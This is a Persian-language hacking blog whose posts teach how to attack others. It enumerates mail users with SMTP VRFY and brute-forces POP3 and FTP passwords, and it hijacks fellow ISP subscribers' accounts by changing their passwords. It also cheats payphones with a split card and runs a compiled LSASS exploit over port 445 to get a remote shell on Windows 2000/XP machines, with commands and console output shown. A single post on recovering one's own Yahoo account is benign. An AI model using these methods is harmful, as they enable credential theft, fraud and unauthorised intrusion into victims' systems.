فهرست اصلی :
صفحه اصلی
نسخه RSS وبلاگ :

نسخه ATOM وبلاگ :

ارتباط با نویسنده :
نامه به مدیر وبلاگ
[yahoo]

نویسنده وبلاگ :
هکر حرفه ای (9)

آرشیو موضوعی :
مودم اسپای / ایمیل جعلی/ترفند برای تمام نشدن کارت اینترنت (4)
آموزش هك بدون برنامه (1)
چگونه آی دی خود را از هکر پس بگیرید (1)
هک کارت تلفن (1)
هک ISP (کارت اینترنت) (1)
یافتن نام كاربر و كلمه عبور از سرور های میل و FTP (1)

آرشیو ماهانه :
مهر 1386 (5)
شهریور 1386 (3)
مرداد 1386 (1)

آرشیو صفحه ای :
1 2

صفحات خارجی :
امکان چت کردن با مدیر وبلاگ

جستجو در وبلاگ :

دوستان :

لینكدونی :
آرشیو لینكدونی

خبرنامه :

نظر سنجی :

به نظر شما چه مطالبی رو بیشتر در این وبلاگ بزاریم خوبه
نفوذ به کامپو تر دیگران
هک سایت
هک وبلاگ
هک ایدی و یاهو مسنجر
ترفند کامپیوتر

امروز :
افراد آنلاین :
بازدید های امروز :
بازدید های دیروز :
كل بازدید ها :

طراح قالب :
Powered By
MIHANBLOG

ارسال شده در تاریخ سه شنبه 24 مهر 1386 و ساعت 04:10 ق.ظ

كرك كردن (Crack) دو مرحله داره : 1 ) پیدا كردن نام كاربر (Username) 2 ) پیدا كردن كلمه عبور (Password) توی این متن می خاهیم ببینیم چطوری می شه ازسرورهای FTP و سرور های میل (Mail) كه از پروتوكل های SMTP و POP3 پیروی می كنن برای كرك كردن استفاده كرد . شاید بپرسین :« اسم كاربر و كلمه عبور میل كه فقط برای نامه خوندنه ! به چه درد من می خوره ؟!؟ » باید توجه داشته باشین كه در بسیاری مواقع سایت ها برای همه سرویس ها كاربر رو فقط با یه اسم كاربر و كلمه عبور می شناسن . یعنی مثلا اگر شما تو سایت jafang.com عضو شدین هم برای خوندن نامه ، هم برای شركت تو مسابقه و قرعه كشی و هم برای شركت در تالار گفتمان از یه اسم كاربر و كلمه عبور استفاده می كنین. پس اگر من username و password مربوط به ایمیل شما رو گیر بیارم می تونم همه جای سایت از اون استفاده كنم!(معمولا این جوریه ، نه همیشه) از این به بعد هر جا گفتیم « اسم » منظورمون « نام كاربر یا Username » و هر جا گفتیم « رمز » منظورمون همون « كلمه عبور یا Password » هست . كم و بیش با FTP آشنا هستین. پس از FTP می گذرم و یه توضیح مختصر در موردSMTP(Simple Mail Transfer Protocol) و POP3 (Post Office Protocol) می دم : سرور SMTP یه سروری هست كه معمولا رو پرت (Port) 25 كار می كنه وبرای فرستادن نامه استفاده می شه. یعنی معمولا وقتی شما با برنامه ای مثل Outlook یه نامه به دوستتون می فرستین اون برنامه به پرت 25 از یه سرور SMTP وصل می شه و به سرور می گه نامه شما رو بفرسته. سرور POP3 سروری هست كه معمولا رو پرت 110 كار می كنه و كارش دریافت نامه هست . مثلا اگر شما از سایت mail.jafang.com یه میل گرفتین و رفتین از تو برنامه ای مثل Outlook میلتونو چك كنین ، به اون برنامه می گین كه به پرت 110 از آدرس mail.jafang.com وصل بشه و نامتونو (كه تو اون سایت نگهداری می شه) بگیره و به شما نشون بده ! مقدمه بسه دیگه ... بریم سر اصل مطلب . (برای اصل مطلب باید استفاده از Telnet رو بلد باشین) آستین ها رو بزنین بالا برای پیدا كردن اسم از یه سرور SMTP استفاده می كنیم . ما با یكی- دو تا دستور از دستورای پروتكل SMTP كار داریم : VRFY و EXPN كه فقط یكیشم برامون كافیه.(برای وارد كردن یه دستور SMTP باید به پرت 25 سروری كه می خواین كركش كنین تلنت بزنین ، بعد دستور رو وارد كنین) شكل كلی دستور VRFY به این شكله : VRFY Username كه به جای Username باید اسمی رو بزنین كه می خواین ببینین درسته یا نه (یعنی كلمه ای كه می خواین ببینین نام كاربری مثل اون تو سرور ثبت شده یا نه) البته از هر سروری نمی شه برای كرك كردن استفاده كرد. چون بعضی از سرورا دستور VRFY رو به طور پیش فرض (Default) غیر فعال كردن ، مثل سرور MDaemon . تو این جور سرورا بعد از وارد كردن دستور VRFY یه جواب با كد 502 می دن. مثلا : 220mail.kolang.com ESMTP MDaemon 6.5.1; Sat, 29 Mar 2003 17:21:56 +0430 VRFY test 502Command is not active اما سرورایی مثل SendMail دستور VRFY رو اجرا میكنن و با كد 250 جواب می دن . مثل این مورد : 220Mail.jafang.com ESMTP Sendmail 8.7.1/8.7.1; Mon, 14 Aug 2000 00:34:01 +0100 VRFY test 250user این جواب سرور Sendmail به آدرس mail.jafang.com به این معنی هست كه كاربری با اسم test وجود داره. اما اگر كاربر تو سیستم وجود نداشته باشه چی ؟ در این صورت سرور با كد 550 جواب می ده . به این مثال نگاه كنین : 220Mail.jafang.com ESMTP Sendmail 8.7.1/8.7.1; Mon, 14 Aug 2000 00:34:01 +0100 VRFY ghashang 550ghashang ... user unknown معنی این جواب سرور اینه كه كابری به اسم ghashang توی سیستم وجود نداره. به این ترتیب شما می تونین یه لیست از username های موجود درست كنین. اگر فكر می كنین كار خسته كننده ایه حق دارین . منم برای همین یه برنامه به اسم SMTP User Checker نوشتم كه این كار رو براتون انجام می ده و می تونین از این آدرس بگیرینش (برای اجراش باید فایلهایmsvbvm60.dll و mswinsck.ocx رو داشته باشین) : http://memp1.tripod.com/downloads/files/smtpuc.exe حالا كه «اسم ها» رو به دست آوردیم باید بریم سراغ «رمز» ها. از اینجا به بعد دیگه با SMTP و پرت 25 كاری نداریم. نوبت POP3 و پرت 110 هست. در پروتكل POP3 برای خوندن نامه ها اول باید با دستورهای زیر به سرور اعلام هویت یا Login كنیم : USER Username PASS Password كه به جای Username اسم و به جای password رمز رو می فرستیم. مثلا می خوایم تو سرور mail.jafang.com اسم test با رمز test رو امتحان كنیم. اول به پرت 110 از آدرس mail.jafang.com تلنت می زنیم. بعد دستورات رو وارد می كنیم (معمولا نمی بینیم چی داریم وارد می كنیم !) : OK mail.jafang.com POP MDaemon 6.5.1 ready+ USER test PASS test بعد از فرستادن اسم، جوابی شبیه به این می گیریم : OK test... Recipient ok+ جوابی كه سرور بعد از فرستادن رمز می ده دو حالت داره: یا با OK+ شروع می شه و مثبته. در این حالت تبریك می گم ! چون اسم و رمزی كه وارد كردین درستن . مثل این : OK test@mail.jafang.com's mailbox has 5 total messages (39191 octets+ یا اینكه با ERR- شروع می شه و منفیه. در این صورت حالتون گرفته شده و رمز غلطه و باید یه رمز دیگه رو امتحان كنین ! مثل این : ERR access denied- اگر به هر دلیل موفق نشدین از سرور POP3 برای امتحان كردن رمز ها استفاده كنین ناراحت نشین ! راه های دیگه ای هم هست. مثلا استفاده از سرور FTP كه روی پرت 21 كار می كنه. روش كار و دستورات لازم مثل POP3 هست. فقط جواب ها تو پروتكل FTP با پروتكل POP3 فرق دارن. مثلا شما از راهی كه گفتیم اسم test رو گیر آوردین و می خواین اونو با رمز test امتحان كنین. می دونین كه سایت jafang.com یه سرور FTP به آدرس ftp.jafang.com داره. حالا اول به پرت 21 از آدرس ftp.jafang.com تلنت بزنید، بعد اسم و رمز رو با دستور های USER و PASS (مثل POP3) وارد كنین. بعد از وارد كردن اسم سرور جوابی با كد 331 شبیه به این می ده : 331Password required for test بعد از فرستادن رمز جوابی كه سرور می ده دو حالت داره : یا كدش 230 هست و مثبته، كه در ای حالت خوش به حالتون. مثل این : 230test logged in یا اینكه كدش 530 هست و منفیه، كه در این حالت رمز غلطه. مثل این : 530User test cannot log in اگه مثل من تنبل هستین و زورتون میاد اسما و رمزا رو یكی یكی تایپ كنین ناراحت نباشین. برنامه های زیادی هستن كه این كارو برامون انجام می دن. یكی از بهترین هاشون كه منم ازش استفاده می كنم Brutus-AET2 هست كه می تونین از لینك زیر بگیرینش : http://www.hoobie.net/brutus/brutus-aet2.zip این برنامه كارایی رو كه در مورد POP3 و FTP گفتیم به خوبی براتون انجام می ده. تازه روش های دیگه ای هم بلده ! مثل استفاده از پروتكل HTTP و حتی Telnet(یعنی پرت 23) ! من دیگه خسته شدم گفتم نظر بدین حالا با خودتونه نظر بیشتر آموزش بیشتر حالا چی ؟؟؟؟؟؟؟؟ منبع : آموزش جدیدترین نرم افزار های هکر

- [ ]

[ نویسنده : هکر حرفه ای ][ موضوع : یافتن نام كاربر و كلمه عبور از سرور های میل و FTP , ]
[ پیام شما [ ] ][ لینک ثابت مطلب ]

ارسال شده در تاریخ پنجشنبه 12 مهر 1386 و ساعت 02:10 ق.ظ

با سلام خدمت تمام دوستان عزیز امروز میخوام یه حال درست حسابی به همتون بده امروز میخوام هک isp به شما اموزش بدم.
البته اون isp باید این باگ رو داشته باشه.
مواد لازم هک isp :
1- باید یک اکانت  از اون ISP داشته باشی .. هر چند عرضشی که داشته باشد !! ۲ ساعت هم کافیست !!!
2- یک عدد برنامه Hyper Terminal که از این مسیر میتونید پیداش کنید.
Start/All Progarms/Accessories/Communications/Hyper Terminal
اموزش:
خوب اول وارد برنامه Hyper Terminal میشم. بعد dial Number اون isp رو تو قسمت Phone Number مینویسید.
بعد روی گزینه Modify کلیک مکنید بعد تیک قسمت Use Country/region code and area code بردارید تا این گزینه غیر فعال بشه بعد برگردید تو قسمت Connect روی Dial کلیک کنید. حالا صبر کنید تا وصل شدید .بعد از وصل شدن اول Username رو از شما میخواد بعد از این Password از شما میخواد . شما باید این دوتا رو وارد کنید تا کاملا وصل شید.
بعد با دستور Systat یا Show Systat می تونید تمام اکانتهای که الان online هستن رو ببینید. بعد شما یه سری اکانت را بر میدارید میرید توی سایت همون isp حالا باید password اکانتهای که هک کردید رو عوض کنید . حالا شما اون isp هک کردید.
امیدوارم از این روش استفاده کنید و حالشو ببرید.؟؟ 
روش قدیمی هست ولی هنوز هم کار میکنه ولی اون ISP باید اون باگ رو داشته باشه ...

اگر جواب داد نظر بدین : آموزش جدید ترین نرم افزار های هکر بدون برنامه ۱۰۰٪ عملی

- [ ]

[ نویسنده : هکر حرفه ای ][ موضوع : هک ISP (کارت اینترنت) , ]
[ پیام شما [ ] ][ لینک ثابت مطلب ]

ارسال شده در تاریخ پنجشنبه 12 مهر 1386 و ساعت 02:10 ق.ظ

این کار برای کرک کارت تلفن :

اول از همه یک کارت تلفن بگیرید هر قدر می خواهید استفاده کنید فقط 5 تومان بمونه کافی بعد 2 قسمتش کنید (از طول) به صورتی که شناستون توی 1قسمت بشه و یک تیکه دیگه هم از کارت بمونه سپس دو تاشون را با هم وارد کنید وشماره را بگیرید اولین زنگ که خورد قسمت شناسه را بکشید بیرون و صفااااااااااااااا

اگر جواب داد نظر بدین : با این وبلاگ از مبتدی به حرفه ای تبدیل شوید

- [ ]

[ نویسنده : هکر حرفه ای ][ موضوع : هک کارت تلفن , ]
[ پیام شما [ ] ][ لینک ثابت مطلب ]

ارسال شده در تاریخ پنجشنبه 12 مهر 1386 و ساعت 02:10 ق.ظ

اگر یک زمانی در اثر بی توجهی کسی ID شما رو هک کرد و PassWord شما رو عوض کرد ، میدونید باید چی کار کنید! شما میتوانید در همچین مواقعی از امکان Forgot Password استفاده کنید! این نکته یادتون باشه که به هنگام Sign Up ، یاهو سوالاتی در زمینه تاریخ تولد ،کد پستی، کشور ،سوال کوتاه و جواب کوتاه و یک آدرس میل برای مواقع اضطراری از شما سوال میکنه! اینا خیلی مهم هستند. این موارد رو همیشه بخاطر داشته باشید که اگر کسی شما رو هک کرد بتونید از این طریق پسوردتون رو پس بگیرید و عوض کنید .حالا برای این کار در صفحه Email Login روی گزینه Password Lookup کلیک کنید در این صفحه همان اطلاعات کلیدی که در قسمت بالا گفته شد رو باید وارد کنید، اگر این اطلاعات را بخاطر دارید که جای امید باقی است در غیر اینصورت از ادامه این کار صرفنظر کنید.خوب حالا بعد از وارد کردن این اطلاعات یاهو درست بودن آنها را چک میکنه و در صورت درست بودن آنها شما به مرحله بعدی هدایت میشوید. در این مرحله که بمنظور ایجاد امنیت بیشتر ایجاد شده است ، یاهو از شما یک سوال کوتاه میپرسد و شما باید به آن پاسخ صحیح بدهید ، البته دقت کنید که این پرسش و پاسخ را خودتان بهنگام Sign Up تعیین کرده اید و باید آنرا به خاطر داشته باشید. بعد از وارد کردن پاسخ کوتاه در صورت درست بودن آن شما قادرید به دو صورت موجود پسورد خود را تغییر داده و تصاحب کنید.

 

توجه:
- Display New Password که بشما رمز عبور جدیدتان را نشان میدهد و Email New Password که رمز عبور جدید شما را به آدرس میلی که به هنگام Sign Up داده اید میل میکند. (Alternate Email).

 

اگر جواب داد نظر بدین لطفاْ  : آموزش هک هکرها

- [ ]

[ نویسنده : هکر حرفه ای ][ موضوع : چگونه آی دی خود را از هکر پس بگیرید , ]
[ پیام شما [ ] ][ لینک ثابت مطلب ]

ارسال شده در تاریخ چهارشنبه 11 مهر 1386 و ساعت 02:10 ق.ظ

آموزش هك كردن بدون برنامه

بخونید و حال کنید

مطلبی كه در اینجا میخوانید یكمی پیچیده است بنابراین اصلا نگران نباشید گام به گام با این متن پیش بروید سعی میكنم خیلی ساده عنوان كنم اصلا نگران نباشید
خلاصه كاری كه ما میكنیم این است كه ما با كارهای زیر میخواهیم به ویندوز 2000 یا ایكس پی حمله كنیم از بیرون دستگاه بدون اینكه به قربانی فایلی بدیم اجرا كنه یا هر ارتباط دیگری با قربانی داشته باشیم یعنی میخوایم خیلی حرفه ای نه مثل این هكر های تازه كار كه تروجان میدن به مردم خیلی حرفه ای خودمان میخوایم یك پورت روی دستگاه قربانی باز كنیم بدون اینكه حتی یك كلمه هم با قربانی حرف بزنیم خوب حالا كه فهمیدید چیكار میخوام بكنیم من یكبار دیگه هم خلاصه بگم یك ای پی انتخاب میكنید و بعد هكش میكنید اولین كاری كه میكنیم این است كه ای پی مورد نظر یا همان قربانی را برای باز بودن پورت 445 امتحان میكنیم
Start->run->CMD
را برای باز كردن یك صفحه كامند پرومت بزنید و بعد با دستور
telnet ip 445
امتحان میكنیم كه ایا پورت 445 باز است یا نه البته شما اگر حرفه ای هستید حتما مثل هكر های حرفه ای برای این كارها یك برنامه خاص را استفاده میكنی بنا به سلیقه خودتان كه از چه برنامه ای خوشتان میاد ولی در اینجا از دستوراتی استفاده میكنیم كه هر كسی خواست این كار را انجام بدهد نیاز به برنامه خاصی نداشته باشه و با كمترین امكانات میخوایم به نتیجه برسیم
خوب توجه كنید به جا ای پی در دستور بالا باید ای پی قربانی را وارد كنید و اگر این دستور را وارد كردید و اتصال برقرار شد یعنی پورت 445 باز است پس گام اول را برداشتید و اگر اتصال برقرار نشد و پیغام خطا دریافت كردید قربانی شما به این نوع حمله نفوذ پذیر نیست
خوب حالا به گام دوم میرویم در زیر كد های حمله به این پورت را مشاهده میكنید این كدها را باید كامپایل بفرمائید و فایل اجرایی كه بدست می اورید را بصورت زیر استفاده میكنید

expl <target> <victim IP> <bindport> [options]

در خط بالا طرز استفاده به این ترتیب است اولین كلمه expl نام فایل اجرایی است كه بعد از كامپایل ایجاد كردید target یك عدد یك رقمی است كه مقدار 0 برای ویندوز ایكس پی است و مقدار 1و2 برای ویندوز 2000 است در اخر این نوشته طرز تشخیص اینكه كدام عدد را استفاده كنید یعنی از كجا بفهمید قربانی ویندوز ایكس پی است كه 0 بزنید یا قربانی ویندوز 2000 است كه 1 یا 2 بزنید را میخوانید
victim ip همان ای پی قربانی شما است كه پورت 445 ان باز بود
binport شماره پورتی است كه میخواهید روی دستگاه قربانی برای شما باز بشود و به ان پورت وصل بشوید و قربانی را هك كنید
option یك دستور است كه در ادامه تك دستور این برنامه را توضیح میدهم

خوب دوست من كار بسیار ساده است فرض كنید ای پی قربانی من 217.0.0.1 است و من طبق ان چیزهایی كه بالا گفتم این كارهای را به تریتب انجام میدهدم
1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445
3- اگر وصل شد از برنامه حمله كه قبلا كامپال كردم و الان اماده استفاده است استفاده میكنم
4- پنجره قبلی را كه در 2 دستور قبل باز كردم میبندم
5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745
----بعد از اینكه دستور خط 6 را زدنید این نوشته ها را مشاهده میكنید----
* [*] Target: IP: 217.0.0.1: OS: winXP [universal] lsass.exe
* [*] Connecting to 217.0.0.1:445 ... OK
* [*] Attacking ... OK
7-حمله انجام شد و پورت مورد نظر شما كه در خط شماره 6 من شماره پورت 24745 را انتخاب كردم الان باز شده تا ما وارد دستگاه قربانی بشویم
8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745
10-به احتمال 95 درصد شما موفق شدید دستگاه قربانی را هك كنید و این خطوط را مشاهده خواهید كرد
* Microsoft windows XP [Version 5.00.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\WINNT\system32>
11- دوست من در این جا شما هر دستوری بزنید روی دستگاه قربانی اجرا میشود مثل اگر بزنید format C: می توانید هارد قربانی را فرمت كنید
ولی توجه كنید یك هكر در اوج قدرت دست به خرابكاری نمیزنه !!! پس هر كاری خواستید بكنید ولی خرابكاری نه !!!

و اما چطوری تشخیص بدهید كه دستگاه قربانی شما ویندوز 2000 است كه از عدد 1 یا 2 استفاده كنید یا ویندوز ایكس پی هست كه از عدد0 استفاده كنید ؟ شما كافی است كه همان دستور بالا را كه برای حمله استفاده مكنید بزنید و فقط به اخرش -t اضافه كنید یعنی اینطوری
expl 0 217.0.0.1 24745 -t
بعد از زدن این دستور برنامه به شما نسخه ویندوز را اعلام میكند اگر نسخه ویندوز را winnt 5.0اعلام كرد یعنی ویندوز 2000 است و شما عدد 1 یا 2 استفاده كنید و اگر winnt 5.1 را اعلام كرد ویندوز ایكس پی است

امیدوارم كه مطلب بالا مورد استفاده شما قرار گرفته باشد توجه كنید برای اینكه همه بتوانند این مطلب را استفاده كنند مجبور شدم كه خیلی جاها را ساده كنم ولی در سورس اصلی برنامه میتوانید به اصل دستور عمل ها پی ببرید .

برای دریافت کد برنامه به زبان سی اینجا کلیک کنید

در ضمن این مطالب فقط برای آموزش است و این وبلاگ هیچ مسئولیتی در قبال خراب كاری شما ندارد 

- [ ]

[ نویسنده : هکر حرفه ای ][ موضوع : آموزش هك بدون برنامه , ]
[ پیام شما [ ] ][ لینک ثابت مطلب ]

» یافتن نام كاربر و كلمه عبور از سرور های میل و FTP
» هک کارت اینر نت ۱۰۰٪ عملی
» هک کارت تلفن
» چگونه آی دی خود را از هکر پس بگیریم
» آموزش هك كردن بدون برنامه
» آموزش ترفند برای تمام نشدن کارت اینترنت۱۰۰٪ عملی
» آمــوزش جدید ترین نرم افزار های هــــــکـر S.b hacker
» ارسال نامه جعلی به دیگران
» هک شماره تلفن هنگام چت کردن